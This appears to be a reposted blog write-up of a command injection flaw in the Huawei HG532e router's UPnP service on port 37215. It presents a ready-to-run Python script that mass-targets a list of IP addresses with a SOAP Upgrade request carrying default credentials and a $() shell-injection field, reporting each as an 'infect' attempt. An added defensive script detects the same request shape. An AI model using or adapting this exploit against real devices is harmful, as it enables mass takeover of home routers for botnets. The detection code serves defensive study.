
HG532e Vulnerability Analysis

Date: 2019-03-04 22:33:12

Vulnerability principle

The upnp program listening on port 37215 has an arbitrary command injection vulnerability.

exp

#!/usr/bin/python
import threading, sys, time, random, socket, re, os, struct, array, requests
from requests.auth import HTTPDigestAuth

ips = open(sys.argv[1], "r").readlines()

cmd = "" # Your MIPS (SSHD)
rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
class exploit(threading.Thread):
        def __init__ (self, ip):
            threading.Thread.__init__(self)
            self.ip = str(ip).rstrip('\n')
        def run(self):
            try:
                url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
                requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
                print "[SOAP] Attempting to infect " + self.ip
            except Exception as e:
                pass
for ip in ips:
    try:
        n = exploit(ip)
        n.start()
        time.sleep(0.03)
    except:
        pass
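
A defender-side check for the request shape used in the script above, as an added example that is not part of the original post: it inspects one captured HTTP request to /ctrlt/DeviceUpgrade_1 and flags NewStatusURL / NewDownloadURL values that are not plain URLs. The sample requests, the 192.0.2.x addresses, the allowlist pattern and the names inspect_request and build_sample are assumptions made for this example.

```python
import html
import re

UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"          # endpoint used in the script above
URL_FIELDS = ("NewStatusURL", "NewDownloadURL")  # arguments of the Upgrade action
# Assumption: a legitimate value is a plain http(s) URL; anything else is suspect.
SAFE_URL = re.compile(r"https?://[A-Za-z0-9._~:/?#@%+=,-]+")


def inspect_request(raw):
    """Return (field, decoded_value) pairs whose value is not a plain URL."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST" or parts[1].split("?", 1)[0] != UPGRADE_PATH:
        return []
    findings = []
    for field in URL_FIELDS:
        pattern = r"<(?:\w+:)?%s\b[^>]*>(.*?)</(?:\w+:)?%s\s*>" % (field, field)
        for match in re.finditer(pattern, body, re.DOTALL):
            # Decode XML character references so "&#36;(" is seen as "$(".
            value = html.unescape(match.group(1)).strip()
            if not SAFE_URL.fullmatch(value):
                findings.append((field, value))
    return findings


def build_sample(status_url, download_url):
    """Build a constructed request for testing the check (not captured traffic)."""
    body = ('<?xml version="1.0" ?>\n'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
            '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
            "<NewStatusURL>%s</NewStatusURL><NewDownloadURL>%s</NewDownloadURL>"
            "</u:Upgrade></s:Body></s:Envelope>") % (status_url, download_url)
    return "POST %s HTTP/1.1\r\nHost: 192.0.2.1:37215\r\n\r\n%s" % (UPGRADE_PATH, body)


BENIGN = build_sample("http://192.0.2.10/status", "http://192.0.2.10/firmware.bin")
INJECTED = build_sample("$(echo HUAWEIUPNP)", "http://192.0.2.10/firmware.bin")
ENCODED = build_sample("&#36;(echo HUAWEIUPNP)", "http://192.0.2.10/firmware.bin")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("injected", INJECTED), ("encoded", ENCODED)):
        print(name, inspect_request(req))
```

The allowlist fails closed: command substitution, backticks, separators, whitespace and CDATA wrappers all fall outside the permitted character set, so they are reported without needing a separate rule for each.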

Original article: https://www.cnblogs.com/H4lo/p/10473687.html
